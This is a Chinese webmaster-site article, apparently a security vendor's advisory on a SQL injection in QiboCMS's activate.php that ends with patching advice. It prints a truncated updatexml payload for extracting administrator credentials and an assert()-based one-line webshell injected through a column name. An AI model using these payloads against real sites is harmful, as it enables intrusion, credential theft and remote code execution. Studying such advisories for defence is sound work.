当前位置:首页 >  站长 >  建站经验 >  正文

齐博cms最新SQL注入网站漏洞 可远程执行代码提权

 2018-10-25 10:57  来源: 用户投稿   我来投稿 撤稿纠错

  一键部署OpenClaw

齐博cms整站系统,是目前建站系统用的较多的一款CMS系统,开源,免费,第三方扩展化,界面可视化的操作,使用简单,便于新手使用和第二次开发,受到许多站长们的喜欢。开发架构使用的是php语言以及mysql数据库,强大的网站并发能力。于近日,我们SINE安全公司发现齐博cms又爆出高危的sql注入漏洞,关于该网站漏洞的详情,我们来详细的分析漏洞的产生以及如何利用。

在对整个网站代码的漏洞检测中发现do目录下的activate.php存在可以插入恶意参数的变量值,我们来看下这个代码:

齐博cms漏洞详情:

从代码里发现这个代码的功能是发送序列号激活的一个功能,从激活的链接地址里,可以看出do/activate.php?job=activate&safe_id=$safe_id 是用来激活序列号的,我们从整个齐博的代码里找到了账号激活的一个大体的过程,首先会注册一个账号,注册账号后会需要发送邮件到用户的邮箱里,邮箱里验证的是safe_id这个值,这个safe_id这个值经过md5的解密后直接生成uaername跟用户的密码,然后再传入到get_safe()这个函数,在这个inc文件夹下的class.user.php代码里找得到这个函数。

我们发现这个get_safe()函数是用来传递用户的激活信息,并进行安全过滤与判断的,从这里我们可以插入恶意的sql语句到网站后端里去,并直接到数据库中执行该语句,我们本地来测试一下是否可以sql注入:

从上图我们可以看出可以进行网站sql注入攻击,那么我们就可以进行查询数据库的账号密码操作,比如查询网站超级管理员的账号密码:and (updatexml(1,concat(0x7e,(substring((selectusername from qb_memberdata where groupid=3),1, 这个语句就是查询超级管理员的账号密码,通过这里我们查到网站的管理员账号密码,登录后台,我们进行远程代码提权了。

增加栏目为${assert($_POST[safe])},一句话后门的代码会直接写入到/data/guide_fid.php文件,用一句话木马连接工具连接即可。

关于齐博cms漏洞的修复,我们SINE安全建议网站的运用者,尽快升级齐博CMS到最新版本,对于sql注入语句进行安全过滤与sql注入防护,对网站的后台默认地址进行详细的更改为其他的文件名。对于前端网站进行sql语句查询的时候进行网站安全白名单系统部署,网站后台的账号密码设置的复杂一些,尽可能的用数字+大小写+特殊字符组合。本文来源:www.sinesafe.com

申请创业报道,分享创业好点子。点击此处,共同探讨创业新机遇!

相关文章

  • 某CMS建站“钓鱼式维权”上央视了

    这就意味着,以后这种碰瓷式维权、钓鱼式维权的事情会越来越少。如给你还收到了某某律师函、商洽函让你赔钱的,你就把这条消息拿给他看。

    标签:
    cms系统
  • 推荐几款市面上常用的免费CMS建站系统

    小编在网站建设行业从业十几年,很多客户或者朋友找我做网站的时候,都喜欢开发一个完全熟悉自己的网站系统,但是小编这里很不推荐。从0到1全新开发,成本,效率和成熟度这些和主流的cms建站系统比起来,完全没有优势,所以大部分建站公司都会选择采用市面上主流的建站系统,今天小编给大家介绍五款我自己用过的还不错

    标签:
    cms系统
  • 敏感信息数据泄露漏洞该怎么查

    数据泄露一旦发生,会对公司的造成极大的影响。如果处理妥当,危机还能够被化解。当公司遭到数据泄露时,至关重要的是在短期内快速的应急响应并处理,全面的前期准备是处理数据泄露事件的核心

  • 网站绕过漏洞如何修复与检测

    本月带给大家的是网站绕过认证漏洞。为了更好地确保业务管理系统的安全防护,基本上每一系统软件都是会存有各式各样的认证功能。普遍的几类认证功能就包含账户密码认证、验证码短信认证

  • 蓝科lankecms网站源码漏洞导致被批量篡改首页文件

    近期受到很多用蓝科lankecms网站源码做的网站的客户反馈首页文件index.html和m.html被篡改增加了跳转代码,导致从百度点击进来的直接跳转到世界杯体育网站上去,而且百度快照收录的标题也被篡改了

热门排行

信息推荐